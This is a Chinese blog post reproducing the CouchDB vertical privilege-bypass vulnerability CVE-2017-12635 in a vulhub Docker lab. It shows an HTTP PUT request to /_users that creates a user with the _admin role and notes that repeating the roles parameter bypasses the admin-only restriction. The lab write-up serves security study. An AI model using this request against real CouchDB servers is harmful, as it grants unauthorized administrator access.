Couchdb 垂直权限绕过漏洞(CVE-2017-12635)复现
前提:搭建好docker环境,安装vulhub
漏洞复现:
-
进入CVE-2017-12635漏洞目录,启动docker服务
service docker start -
启动漏洞环境
sudo docker-compose up -d
-
查看容器状态,发现5984端口开启
sudo docker ps
-
访问localhost:5984/_utils/,查看环境是否搭建成功,如下图即成功搭建
-
构造发送一个正常的添加用户数据包
PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: 172.18.0.1:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 92
{
"type": "user",
"name": "vulhub",
"roles": ["_admin"],
"password": "vulhub"
}
服务器返回错误,显示只允许admin添加用户
- 重复发送roles参数,成功绕过限制,创建用户vulhub
- 尝试用vulhub/vulhub登录,登陆成功
- 关闭镜像
sudo docker-compose down -v
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 25岁的心里话
· 闲置电脑爆改个人服务器(超详细) #公网映射 #Vmware虚拟网络编辑器
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· 零经验选手,Compose 一天开发一款小游戏!
· 一起来玩mcp_server_sqlite,让AI帮你做增删改查!!